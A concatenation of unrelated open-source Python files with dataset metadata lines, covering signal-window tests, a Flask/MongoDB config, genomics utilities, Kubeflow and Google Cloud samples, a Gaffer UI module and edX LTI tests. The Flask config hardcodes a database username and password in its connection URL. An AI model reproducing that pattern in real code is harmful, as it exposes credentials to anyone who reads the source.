vec7 = array([ 0.1116911 , 0.41962999, 0.81377359, 1. , 0.81377359, 0.41962999, 0.1116911 ])
vec8 = array([ 0.09455132, 0.34937508, 0.71822375, 1. , 1. , 0.71822375, 0.34937508, 0.09455132])
for x, y in zip(window_checbwin(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_chebwin(7), vec7):
assert_almost_equal(x, y)
def test_gaussian():
"""unit and functional test gaussian"""
vec8 = array([ 0.09139376, 0.29502266, 0.64438872, 0.9523448 , 0.9523448 , 0.64438872, 0.29502266, 0.09139376])
vec7 = array([ 0.1006689 , 0.36044779, 0.77483743, 1. , 0.77483743, 0.36044779, 0.1006689 ])
for x, y in zip(window_gaussian(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_gaussian(7), vec7):
assert_almost_equal(x, y)
def test_cauchy():
window_cauchy(64)
def test_cosine():
window_cosine(64)
assert window_cosine(1) == np.array([1.])
def test_riemann():
window_riemann(64)
def test_lanczos():
window_lanczos(64)
assert window_lanczos(1) == np.array([1.])
def test_poisson():
window_poisson(64)
#assert window_poisson(1) == np.array([1.])
def test_poisson_hanning():
window_poisson_hanning(64)
def test_bartlett_hann():
vec7 = array([ 0. , 0.27, 0.73, 1. , 0.73, 0.27, 0. ])
vec8 = array([ 0., 0.2116453, 0.60170081, 0.92808246, 0.92808246, 0.60170081, 0.2116453, 0.])
for x, y in zip(window_bartlett_hann(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_bartlett_hann(7), vec7):
assert_almost_equal(x, y)
assert window_bartlett_hann(1) == np.array([1.])
def test_window_visu():
window_visu(64, 'hamming')
def test_enbw():
N = 64
w = create_window(N, 'rectangle')
assert enbw(w) == 1.
def test_window_parzen():
vec7 = array([ 0.0058309 , 0.1574344 , 0.65014577, 1. , 0.65014577, 0.1574344 , 0.0058309 ])
vec8 = array([ 0.00390625, 0.10546875, 0.47265625, 0.91796875, 0.91796875, 0.47265625, 0.10546875, 0.00390625])
for x, y in zip(window_parzen(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_parzen(7), vec7):
assert_almost_equal(x, y)
def test_bohman():
vec8 = array([ 3.89804309e-17, 7.07247468e-02, 4.37484012e-01, 9.10368513e-01, 9.10368513e-01, 4.37484012e-01, 7.07247468e-02, 3.89804309e-17])
vec7 = array([ 3.89804309e-17, 1.08997781e-01, 6.08997781e-01, 1.00000000e+00, 6.08997781e-01, 1.08997781e-01, 3.89804309e-17])
for x, y in zip(window_bohman(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_bohman(7), vec7):
assert_almost_equal(x, y)
def test_chebwin():
vec8 = array([ 0.09455132, 0.34937508, 0.71822375, 1., 1.,0.71822375, 0.34937508, 0.09455132])
vec7 = array([ 0.1116911 , 0.41962999, 0.81377359, 1., 0.81377359, 0.41962999, 0.1116911 ])
for x, y in zip(window_chebwin(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_chebwin(7), vec7):
assert_almost_equal(x, y)
def test_nuttall():
window_nuttall(64)
assert window_nuttall(1) == np.array([1.])
def test_blackman_nuttall():
vec7 = array([ 3.62800000e-04, 6.13345000e-02, 5.29229800e-01, 1.00000000e+00, 5.29229800e-01, 6.13345000e-02, 3.62800000e-04])
vec8 = array([ 3.62800000e-04, 3.77757690e-02, 3.42727620e-01, 8.91851861e-01, 8.91851861e-01, 3.42727620e-01, 3.77757690e-02, 3.62800000e-04])
|
hkhamm/proj5-mongo
|
CONFIG.py
|
Python
|
artistic-2.0
| 563
| 0.003552
|
"""
Configuration of 'memos' Flask app.
Edit to fit development or deployment environment.
"""
# import random
# localhost
# PORT = 5000
# DEBUG = True
# MONGO_PORT =
|
27017
# ix.cs.uoregon.edu
PORT = 7420 # random.randint(5000, 8000)
MONGO_PORT = 4152
DEBUG = False # Because it's unsafe to run outside localhost
# both
MONGO_URL = "mongodb://memos_user:peach-cobbler@localhost:4152/memos"
# MONGO_USER = 'memos_user'
# MONGO_PW = 'peach-cobbler'
# MONGO_DB = 'memos'
# MONGO_URL =
|
'mongodb://{$MONGO_USER}:{$MONGO_PW}@localhost:{$MONGO_PORT}/{$MONGO_DB}'
|
phac-nml/neptune
|
neptune/Utility.py
|
Python
|
apache-2.0
| 7,808
| 0.001281
|
#!/usr/bin/env python
"""
# =============================================================================
Copyright Government of Canada 2015-2017
Written by: Eric Marinier, Public Health Agency of Canada,
National Microbiology Laboratory
Funded by the National Micriobiology Laboratory and the Genome Canada / Alberta
Innovates Bio Solutions project "Listeria Detection and Surveillance
using Next Generation Genomics"
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License. You may obtain a copy of the
License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
# =============================================================================
"""
"""
# =============================================================================
This script provides shared utility to other scripts.
# =============================================================================
"""
import math
import os
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
AGGREGATE_OTHER = "__OTHER__"
"""
# =============================================================================
GET AGGREGATION TAGS
--------------------
PURPOSE
-------
Produces a list of aggregation tags associated with the specified degree of
organization.
INPUT
-----
[INT >= 0] [parallelization]
The degree of parallelization.
RETURN
------
[STRING ITERABLE] [tags]
An iterable object of sequence tags.
There will be (4^[organization]) tags produced and an "AGGREGATE_OTHER"
tag.
These tags will contain A, C, G, and T, and arranged in lexicographic
order with the "AGGREGATE_OTHER" tag at the very end.
# =============================================================================
"""
def getAggregationTags(parallelization):
if parallelization < 0:
raise RuntimeError("The degree of parallelization is out of range.")
instances = int(math.pow(4.0, float(parallelization)))
tags = []
# initialize
for i in range(instances):
tag = generateSequence(i, parallelization)
tags.append(tag)
tags.append(AGGREGATE_OTHER)
return tags
"""
# =============================================================================
GENERATE SEQUENCE
-----------------
PURPOSE
-------
Generates and returns a nucleotide sequence of a specified length from a passed
integer value.
INPUT
-----
[INT >= 0] [integer]
The integer to convert to sequence.
[INT >= 0] [length]
The length of the sequence to return.
RETURN
------
[STRING] [sequence]
A sequence of length [length] generated from the [integer].
Sequences are genrated such that, for all 0 <= x < 4^[length]:
generateSequence(x, [length]) < generateSequence(x+1, [length])
when evaluated lexicographically.
# =============================================================================
"""
def generateSequence(integer, length):
if integer < 0:
raise RuntimeError("The sequence integer is out of range.")
if length < 0:
raise RuntimeError("The sequence length is out of range.")
current = integer
sequence = ""
for i in range(length):
base = current % 4
if base == 0:
sequence = "A" + sequence
elif base == 1:
sequence = "C" + sequence
elif base == 2:
sequence = "G" + sequence
elif base == 3:
sequence = "T" + sequence
current = current / 4
return sequence
"""
# =============================================================================
REVERSE COMPLEMENT
------------------
PURPOSE
-------
Produces and returns the reverse complement of the sequence.
INPUT
-----
[STRING] [sequence]
The sequence to reverse complement.
RETURN
------
[STRING] [reverse
|
]
The reverse complement of the passed sequence.
# =============================================================================
"""
def reverseComplement(sequence):
reverse = str(Seq(sequence, generic_dna).reverse_complement())
return reverse
"""
# =========
|
====================================================================
BUILD REFERENCES
----------------
PURPOSE
-------
Builds string references (contig pieces) from the reference file.
INPUT
-----
[FILE] [referenceFile]
The file from which to build the string reference.
RETURN
------
[STRING ITERABLE] [references]
A list of string references where contigs comprise the different items
in the iterable object.
# =============================================================================
"""
def buildReferences(referenceFile):
references = {}
# build references
for line in referenceFile:
# new reference:
if line[0] == ">":
tokens = (line[1:]).split()
referenceName = tokens[0]
references[referenceName] = ""
# continue building reference:
else:
references[referenceName] += line.strip().upper()
return references
"""
# =============================================================================
ESTIMATE REFERENCE PARAMETERS
PURPOSE:
Estimates the size of the reference and GC-content from one or more
reference fragments.
INPUT:
[STRING ITERABLE] [references] - A list of string references.
RETURN:
[TUPLE: INT, FLOAT] [size, gcContent] - An estimate for the reference size
and GC-content.
# =============================================================================
"""
def estimateReferenceParameters(references):
if references is None or len(references) < 1:
raise RuntimeError("There are no references.")
sumGC = 0
sumAT = 0
size = 0
for reference in references:
sumGC += references[reference].count('G') \
+ references[reference].count('C')
sumAT += references[reference].count('A') \
+ references[reference].count('T')
size += len(references[reference])
if (sumGC + sumAT) == 0:
raise RuntimeError(
"There are no A, C, G, or T characters in reference: " +
str(reference) + "\n")
gcContent = float(sumGC) / float(sumGC + sumAT)
return size, gcContent
"""
# =========================================================================
EXPAND INPUT
PURPOSE:
Expands the file input locations to include all files within all
directories.
The directories are not included in the final list. However, all
non-directories located within the directories are included as
individual files.
INPUT:
[(FILE LOCATION) LIST] [inputLocations] - The file input locations.
[(FILE LOCATION) LIST] [result] - The list to fill with the expanded
input entries.
RETURN:
[NONE]
POST:
The passed [result] parameter will contain the expanded input.
# =========================================================================
"""
def expandInput(inputLocations, result):
# Expand directories into files:
for location in inputLocations:
if os.path.isdir(location):
onlyfiles = [
os.path.join(location, f)
for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
result += onlyfiles
else:
result += [location]
# Convert to absolute path:
for i in range(len(result)):
result[i] = os.path.abspath(result[i])
|
googleapis/python-aiplatform
|
samples/generated_samples/aiplatform_v1_generated_model_service_get_model_evaluation_async.py
|
Python
|
apache-2.0
| 1,506
| 0.000664
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetModelEvaluation
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
|
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_v1_generated_ModelService_GetModelEvaluation_async]
from google.cloud import aiplatform_v1
async def sample_get_model_evaluation():
# Create a clien
|
t
client = aiplatform_v1.ModelServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1.GetModelEvaluationRequest(
name="name_value",
)
# Make the request
response = await client.get_model_evaluation(request=request)
# Handle the response
print(response)
# [END aiplatform_v1_generated_ModelService_GetModelEvaluation_async]
|
kubeflow/pipelines
|
samples/contrib/kubeflow-katib/mpi-job-horovod.py
|
Python
|
apache-2.0
| 8,891
| 0.001462
|
# Kubeflow Pipeline with Katib component.
# In this example you will create Katib Experiment using Bayesian optimization algorithm.
# As a Trial template you will use Kubeflow MPIJob with Horovod MNIST training container.
# After that, you will compile a Kubeflow Pipeline with your Katib Experiment.
# Use Kubeflow Pipelines UI to upload the Pipeline and create the Experiment and Run.
# This Experiment is similar to this: https://github.com/kubeflow/katib/blob/master/examples/v1beta1/kubeflow-training-operator/mpijob-horovod.yaml
# Check the training container source code here: https://github.com/kubeflow/mpi-operator/tree/master/examples/horovod.
# Note: To run this example, your Kubernetes cluster should run MPIJob operator.
# Follow this guide to install MPIJob on your cluster: https://www.kubeflow.org/docs/components/training/mpi/
import kfp
import kfp.dsl as dsl
from kfp import components
from kubeflow.katib import ApiClient
from kubeflow.katib import V1beta1ExperimentSpec
from kubeflow.katib import V1beta1AlgorithmSpec
from kubeflow.katib import V1beta1AlgorithmSetting
from kubeflow.katib import V1beta1ObjectiveSpec
from kubeflow.katib import V1beta1ParameterSpec
from kubeflow.katib import V1beta1FeasibleSpace
from kubeflow.katib import V1beta1TrialTemplate
from kubeflow.katib import V1beta1TrialParameterSpec
@dsl.pipeline(
name="Launch Katib MPIJob Experiment",
description="An example to launch Katib Experiment with MPIJob"
)
def horovod_mnist_hpo(
experiment_name: str = "mpi-horovod-mnist",
experiment_namespace: str = "kubeflow-user-example-com",
):
# Trial count specification.
max_trial_count = 6
max_failed_trial_count = 3
parallel_trial_count = 2
# Objective specification.
objective = V1beta1ObjectiveSpec(
type="minimize",
goal=0.01,
objective_metric_name="loss",
)
# Algorithm specification.
algorithm = V1beta1AlgorithmSpec(
algorithm_name="bayesianoptimization",
algorithm_settings=[
V1beta1AlgorithmSetting(
name="random_state",
value="10"
)
]
)
# Experiment search space.
# In this example we tune learning rate and number of training steps.
parameters = [
V1beta1ParameterSpec(
name="lr",
parameter_type="double",
feasible_space=V1beta1FeasibleSpace(
min="0.001",
max="0.003"
),
),
V1beta1ParameterSpec(
name="num-steps",
parameter_type="int",
feasible_space=V1beta1FeasibleSpace(
min="50",
max="150",
step="10"
),
),
]
# JSON template specification for the Trial's Worker Kubeflow MPIJob.
trial_spec = {
"apiVersion": "kubeflow.org/v1",
"kind": "MPIJob",
"spec": {
"slotsPerWorker": 1,
"cleanPodPolicy": "Running",
"mpiReplicaSpecs": {
"Launcher": {
"replicas": 1,
"template": {
"metadata": {
"annotations": {
"sidecar.istio.io/inject": "false"
}
},
"spec": {
"containers": [
{
"image": "docker.io/kubeflow/mpi-horovod-mnist",
"name": "mpi-launcher",
"command": [
"mpirun"
],
"args": [
"-np",
"2",
"--allow-run-as-root",
"-bind-to",
"none",
"-map-by",
"slot",
"-x",
"LD_LIBRARY_PATH",
|
"-x",
"PATH",
"-mca",
"pml",
"ob1",
"-mca",
"btl",
"^openib",
"python",
"/examples/tensorflow_mnist.
|
py",
"--lr",
"${trialParameters.learningRate}",
"--num-steps",
"${trialParameters.numberSteps}"
],
"resources": {
"limits": {
"cpu": "500m",
"memory": "2Gi"
}
}
}
]
}
}
},
"Worker": {
"replicas": 2,
"template": {
"metadata": {
"annotations": {
"sidecar.istio.io/inject": "false"
}
},
"spec": {
"containers": [
{
"image": "docker.io/kubeflow/mpi-horovod-mnist",
"name": "mpi-worker",
"resources": {
"limits": {
"cpu": "500m",
"memory": "4Gi"
}
}
}
]
}
}
}
}
}
}
# Configure parameters for the Trial template.
trial_template = V1beta1TrialTemplate(
primary_pod_labels={
"mpi-job-role": "launcher"
},
primary_container_name="mpi-launcher",
success_condition='status.conditions.#(type=="Succeeded")#|#(status=="True")#',
failure_condition='status.conditions.#(type=="Failed")#|#(status=="True")#',
trial_parameters=[
V1beta1TrialParameterSpec(
name="learningRate",
description="Learning rate for the training model",
reference="lr"
),
V1beta1TrialParameterSpec(
name="numberSteps",
description="Number of training steps",
reference="num-steps"
),
],
trial_spec=trial_spec
)
# Create Experiment specification.
experiment_spec = V1beta1ExperimentSpec(
max_trial_count=max_trial_count,
max_failed_trial_count=max_failed_trial_count,
parallel_trial_count=parallel_trial_count,
objective=objective,
algorithm=algorithm,
parameters=parameters,
trial_template=trial_template
)
# Get the Katib launcher.
# Load component from the URL or from the file.
katib_experiment_launcher_op = components.load_component_from_url(
"https://raw.githubusercontent.com/kubeflow/pipelines/master/components/kubeflow/katib-launcher/component.yaml")
# katib_experiment_launcher_op = components.load_component_from_file(
# "../../../components/kubeflow/katib-launcher/component.yaml"
# )
# Katib launcher component.
# Experi
|
nesaro/driza
|
pyrqt/carga/operaciones/compmedsim.py
|
Python
|
gpl-2.0
| 3,492
| 0.024482
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#Copyright (C) 2006 Inmaculada Luengo Merino, Néstor Arocha Rodríguez
#This file is part of pyrqt.
#
#pyrqt is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#pyrqt is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with pyrqt; if not, write to the Free Software
#Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Ejecuta una comparacion de medias simple"""
nombre=u"Comparación de medias simple"
tipo="Calculo"
diccionarioalternativa={ "nombre":u"Hipótesis alternativa", "tipo":"SeleccionSimple", "opciones":["<",">","!="]}
significacion={"nombre":u"Significación","tipo":"EntradaTexto"}
mediaobjetivo={"nombre":"Media objetivo","tipo":"EntradaTexto"}
widget={"tipo":"CalculoSimple","opciones":[mediaobjetivo,significacion,diccionarioalternativa]}
def funcion(dato,variable,caso,opciones):
from rpy import r #pylint: disable=import-error
lis
|
ta=[float(x) for x in dato.getCol(variable,caso=caso)]
if opciones[u"Hipótesis alternativa"]==">":
lateral="greater"
elif opciones[u"Hipótesis alternativa"]=="<":
lateral="less"
else:
lateral="two.sided"
diccionario=r.t_test(lista,alternativ
|
e=lateral,mu=float(opciones["Media objetivo"]),conf_level=float(opciones[u"Significación"])/100)
diccionario["confianza"]=float(opciones[u"Significación"])/100
return diccionario
def initresultado(resultado,opciones):
"""Inicializa al objeto resultado, añadiendole lo que crea conveniente"""
resultado.addTablaSimple("resultado")
resultado["resultado"].titulo=u"Prueba de Hipótesis"
lista=[]
if opciones["caso"]:
lista.append("Caso")
lista+=[u"Hipótesis alternativa","Intervalo de confianza","Valor p obtenido","Conclusion"]
resultado["resultado"].settitulo(lista)
def interfazresultado(resultado,listaopciones,floatrender=None):
"""Este método dice como introducir los datos en la tabla"""
lista=[]
variable=listaopciones[0]
caso=listaopciones[1]
if caso:
lista.append(caso)
diccionario=listaopciones[2]
lista.append(diccionario["alternative"])
lista.append(diccionario["conf.int"])
lista.append(diccionario["p.value"])
if (diccionario["p.value"] < diccionario["confianza"]):
texto=u"Hay evidencias estadísticas de que la hipótesis alternativa es válida"
else:
texto=u"No hay evidencias estadísticas de que la hipótesis alternativa sea válida"
lista.append(texto)
resultado["resultado"].set(variable,lista)
def comprobarentrada(opciones):
if u"Significación" not in opciones or "Media objetivo" not in opciones:
from pyrqt.excepciones import OpcionesIncorrectaException
raise OpcionesIncorrectaException
def funcionprincipal(): pass
def funcionchequeocondiciones(interfazdato): return False
def funcionchequeoentradausuario(opciones): return False
definicionresultado = []
tipo = "Casos" #FIXME: Tipo incorrecto
etiquetas = ["Otros"]
widget = {"tipo":"Variable", "opciones":[]}
|
agry/NGECore2
|
scripts/mobiles/generic/static/tatooine/staticstorm.py
|
Python
|
lgpl-3.0
| 1,106
| 0.027125
|
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCustomName('a Stormtrooper')
mobileTemplate.setLevel(1)
mobileTemplate.setDifficulty(Difficulty.NORMAL)
mobileTemplate.setSocialGroup("township")
mobileTemplate.setOptionsBitmask(Options.INVULNERABLE)
templates = Vector()
templates.add('object/mobile/shared_stormtrooper.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = V
|
ector()
weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('creatureMeleeAttack')
mobileTemplate.setAttacks(attack
|
s)
core.spawnService.addMobileTemplate('staticstorm', mobileTemplate)
return
|
hradec/gaffer
|
python/GafferUI/AnnotationsUI.py
|
Python
|
bsd-3-clause
| 5,068
| 0.040055
|
##########################################################################
#
# Copyright (c) 2021, Cinesite VFX Ltd. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of Cinesite VFX Ltd. nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import imath
import IECore
import Gaffer
import GafferUI
def appendNodeContextMenu
|
Definitions( graphEditor, node, menuDefinition ) :
def append( menuPath, name ) :
menuDefinition.append(
menuPath,
{
"command" : functools.partial( __annotate, node, name ),
"active" : not Gaffer
|
.MetadataAlgo.readOnly( node ),
}
)
names = Gaffer.MetadataAlgo.annotationTemplates( userOnly = True )
if not names :
append( "/Annotate...", "user" )
else :
for name in names :
append(
"/Annotate/{}...".format( IECore.CamelCase.toSpaced( name ) ),
name
)
menuDefinition.append( "/Annotate/Divider", { "divider" : True } )
append( "/Annotate/User...", "user" )
def __annotate( node, name, menu ) :
dialogue = __AnnotationsDialogue( node, name )
dialogue.wait( parentWindow = menu.ancestor( GafferUI.Window ) )
class __AnnotationsDialogue( GafferUI.Dialogue ) :
def __init__( self, node, name ) :
GafferUI.Dialogue.__init__( self, "Annotate" )
self.__node = node
self.__name = name
template = Gaffer.MetadataAlgo.getAnnotationTemplate( name )
annotation = Gaffer.MetadataAlgo.getAnnotation( node, name ) or template
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as layout :
self.__textWidget = GafferUI.MultiLineTextWidget(
text = annotation.text() if annotation else "",
)
self.__textWidget.textChangedSignal().connect(
Gaffer.WeakMethod( self.__updateButtonStatus ), scoped = False
)
if not template :
self.__colorChooser = GafferUI.ColorChooser(
annotation.color() if annotation else imath.Color3f( 0.15, 0.26, 0.26 ),
useDisplayTransform = False
)
self.__colorChooser.colorChangedSignal().connect(
Gaffer.WeakMethod( self.__updateButtonStatus ), scoped = False
)
else :
self.__colorChooser = None
self._setWidget( layout )
self.__cancelButton = self._addButton( "Cancel" )
self.__removeButton = self._addButton( "Remove" )
self.__annotateButton = self._addButton( "Annotate" )
self.__updateButtonStatus()
def wait( self, **kw ) :
button = self.waitForButton( **kw )
if button is self.__cancelButton or button is None :
return
with Gaffer.UndoScope( self.__node.scriptNode() ) :
if button is self.__removeButton :
Gaffer.MetadataAlgo.removeAnnotation( self.__node, self.__name )
else :
Gaffer.MetadataAlgo.addAnnotation(
self.__node, self.__name,
self.__makeAnnotation()
)
def __updateButtonStatus( self, *unused ) :
existingAnnotation = Gaffer.MetadataAlgo.getAnnotation( self.__node, self.__name )
newAnnotation = self.__makeAnnotation()
self.__cancelButton.setEnabled( newAnnotation != existingAnnotation )
self.__removeButton.setEnabled( bool( existingAnnotation ) )
self.__annotateButton.setEnabled( bool( newAnnotation ) and newAnnotation != existingAnnotation )
def __makeAnnotation( self ) :
if not self.__textWidget.getText() :
return Gaffer.MetadataAlgo.Annotation()
if self.__colorChooser is not None :
return Gaffer.MetadataAlgo.Annotation(
self.__textWidget.getText(),
self.__colorChooser.getColor()
)
else :
return Gaffer.MetadataAlgo.Annotation( self.__textWidget.getText() )
|
stvstnfrd/edx-platform
|
lms/djangoapps/courseware/tests/test_lti_integration.py
|
Python
|
agpl-3.0
| 9,253
| 0.00281
|
"""LTI integration tests"""
import json
from collections import OrderedDict
import mock
import oauthlib
import six
from django.conf import settings
from django.urls import reverse
from six import text_type
from lms.djangoapps.courseware.tests.helpers import BaseTestXmodule
from lms.djangoapps.courseware.views.views import get_course_lti_endpoints
from openedx.core.lib.url_utils import quote_slashes
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.x_module import STUDENT_VIEW
class TestLTI(BaseTestXmodule):
"""
Integration test for lti xmodule.
It checks overall code, by assuring that context that goes to template is correct.
As part of that, checks oauth signature generation by mocking signing function
of `oauthlib` library.
"""
CATEGORY = "lti"
def setUp(self):
"""
Mock oauth1 signing of requests library for testing.
"""
super(TestLTI, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
mocked_nonce = u'135685044251684026041377608307'
mocked_timestamp = u'1234567890'
mocked_signature_after_sign = u'my_signature%3D'
mocked_decoded_signature = u'my_signature='
# Note: this course_id is actually a course_key
context_id = text_type(self.item_descriptor.course_id)
user_id = text_type(self.item_descriptor.xmodule_runtime.anonymous_student_id)
hostname = self.item_descriptor.xmodule_runtime.hostname
resource_link_id = text_type(six.moves.urllib.parse.quote('{}-{}'.format(hostname,
self.item_descriptor.location.html_id()
)))
sourcedId = "{context}:{resource_link}:{user_id}".format(
context=six.moves.urllib.parse.quote(context_id),
resource_link=resource_link_id,
user_id=user_id
)
self.correct_headers = {
u'user_id': user_id,
u'oauth_callback': u'about:blank',
u'launch_presentation_return_url': '',
u'lti_message_type': u'basic-lti-launch-request',
u'lti_version': 'LTI-1p0',
u'roles': u'Student',
u'context_id': context_id,
u'resource_link_id': resource_link_id,
u'lis_result_sourcedid': sourcedId,
u'oauth_nonce': mocked_nonce,
u'oauth_timestamp': mocked_timestamp,
u'oauth_consumer_key': u'',
u'oauth_signature_method': u'HMAC-SHA1',
u'oauth_version': u'1.0',
u'oauth_signature': mocked_decoded_signature
}
saved_sign = oauthlib.oauth1.Client.sign
self.expected_context = {
'display_name': self.item_descriptor.display_name,
'input_fields': self.correct_headers,
'element_class': self.item_descriptor.category,
'element_id': self.item_descriptor.location.html_id(),
'launch_url': u'http://www.example.com', # default value
'open_in_a_new_page': True,
'form_url': self.item_descriptor.xmodule_runtime.handler_url(self.item_descriptor,
'preview_handler').rstrip('/?'),
'hide_launch': False,
'has_score': False,
'module_score': None,
'comment': u'',
'weight': 1.0,
'ask_to_send_username': self.item_descriptor.ask_to_send_username,
'ask_to_send_email': self.item_descriptor.ask_to_send_email,
'description': self.item_descriptor.description,
'button_text': self.item_descriptor.button_text,
'accept_grades_past_due': self.item_descriptor.accept_grades_past_due,
}
def mocked_sign(self, *args, **kwargs):
"""
Mocked oauth1 sign function.
"""
# self is <oauthlib.oauth1.rfc5849.Client object> here:
__, headers, __ = saved_sign(self, *args, **kwargs)
# we should replace nonce, timestamp and signed_signature in headers:
old = headers[u'Authorization']
old_parsed = OrderedDict([param.strip().replace('"', '').split('=') for param in old.split(',')])
old_parsed[u'OAuth oauth_nonce'] = mocked_nonce
old_parsed[u'oauth_timestamp'] = mocked_timestamp
old_parsed[u'oauth_signature'] = mocked_signature_after_sign
headers[u'Authorization'] = ', '.join([k + '="' + v + '"' for k, v in old_parsed.items()])
return None, headers, None
patcher = mock.patch.object(oauthlib.oauth1.Client, "sign", mocked_sign)
patcher.start()
self.addCleanup(patcher.stop)
def test_lti_constructor(self):
generated_content = self.item_descriptor.render(STUDENT_VIEW).content
expected_content = self.runtime.render_template('lti.html', self.expected_context)
assert generated_content == expected_content
def test_lti_preview_handler(self):
generated_content = self.item_descriptor.preview_handler(None, None).body
expected_content = self.runtime.render_template('lti_form.html', self.expected_context)
assert generated_content.decode('utf-8') == expected_content
class TestLTIBlockListing(SharedModuleStoreTestCase):
"""
a test for the rest endpoint that lists LTI modules in a course
"""
# arbitrary constant
COURSE_SLUG = "100"
COURSE_NAME = "test_course"
@classmethod
def setUpClass(cls):
super(TestLTIBlockListing, cls).setUpClass()
cls.course = CourseFactory.create(display_name=cls.COURSE_NAME, number=cls.COURSE_SLUG)
cls.chapter1 = ItemFactory.create(
parent_location=cls.course.location,
display_name="chapter1",
category='chapter')
cls.section1 = ItemFactory.create(
parent_location=cls.chapter1.location,
display_name="section1",
category='sequential')
cls.chapter2 = ItemFactory.create(
parent_location=cls.course.location,
display_name="chapter2",
category='chapter')
cls.section2 = ItemFactory.create(
parent_location=cls.chapter2.location,
display_name="section2",
category='sequential')
# creates one draft and one published lti module, in different sections
cls.lti_published = ItemFactory.create(
parent_location=cls.section1.location,
display_name="lti published",
category="lti",
location=cls.course.id.make_usage_key('lti', 'lti_published'),
)
cls.lti_draft = ItemFactory.create(
parent_location=cls.section2.location,
display_name="lti draft",
category="lti",
location=cls.course.id.make_usage_key('lti', 'lti_draft'),
publish_item=False,
)
def expected_handler_url(self, handler):
"""convenience method to get
|
the reversed handler urls"""
return "https://{}{}".format(settings.SITE_NAME, reverse(
'xblock_handler_noauth',
args=[
text_type(self.course.id),
quote_slashes(text_type(self.lti_published.scope_ids.usage_id)),
handler
]
))
def
|
test_lti_rest_bad_course(self):
"""Tests what happens when the lti listing rest endpoint gets a bad course_id"""
bad_ids = [u"sf", u"dne/dne/dne", u"fo/ey/\\u5305"]
for bad_course_id in bad_ids:
lti_rest_endpoints_url = 'courses/{}/lti_rest_endpoints/'.format(bad_course_id)
response = self.client.get(lti_rest_endpoints_url)
assert 404 == response.status_code
def test_lti_rest_listing(self):
"""tests that the draft lti module is part of the endpoint response"""
request = mock.Mock()
request.method
|
kk1987/pycparser
|
examples/explore_ast.py
|
Python
|
bsd-3-clause
| 5,702
| 0.006314
|
#-----------------------------------------------------------------
# pycparser: explore_ast.py
#
# This example demonstrates how to "explore" the AST created by
# pycparser to understand its structure. The AST is a n-nary tree
